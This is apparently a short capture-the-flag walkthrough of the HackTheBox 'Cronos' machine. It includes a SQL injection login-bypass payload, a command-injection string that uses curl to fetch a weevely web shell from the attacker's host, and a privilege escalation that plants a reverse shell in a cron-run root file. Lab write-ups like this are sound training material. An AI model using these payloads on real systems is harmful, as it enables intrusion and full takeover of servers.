Network

Enumeration

To start with, we only have a DNS and a web page which is the default Apache2 page

Looking into the DNS we can confirm the domain name: cronos.htb

From the domain name more enumeration with gobuster

gobuster dns --domain cronos.htb --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

This form is vulnerable to SQLI, using the following payload admin' or 1=1-- - we can bypass the login form and access a page that has a form to run commands: Traceroute and Ping

Command Injection

We are able to run custom commands via the form we just discovered

Foothold

Because we have command execution on the server, we can upload a reverse shell script like weevely https://github.com/epinna/weevely3 and get a basic shell on the server.

First, let’s first generate an agent

/usr/share/weevely/weevely.py generate 123 reverse.php

Now let’s upload the agent on the server

-c1 127.0.0.1; curl http://10.10.16.4/reverse.txt -o reverse.php

Let’s finish with running the agent, which give us a shell access on the server as www-data

Priv escalation

Looking into the crons we can see that the machine run a PHP file artisan every minute as user root

adding a reverse shell payload to this file

give use access to the victim machine as root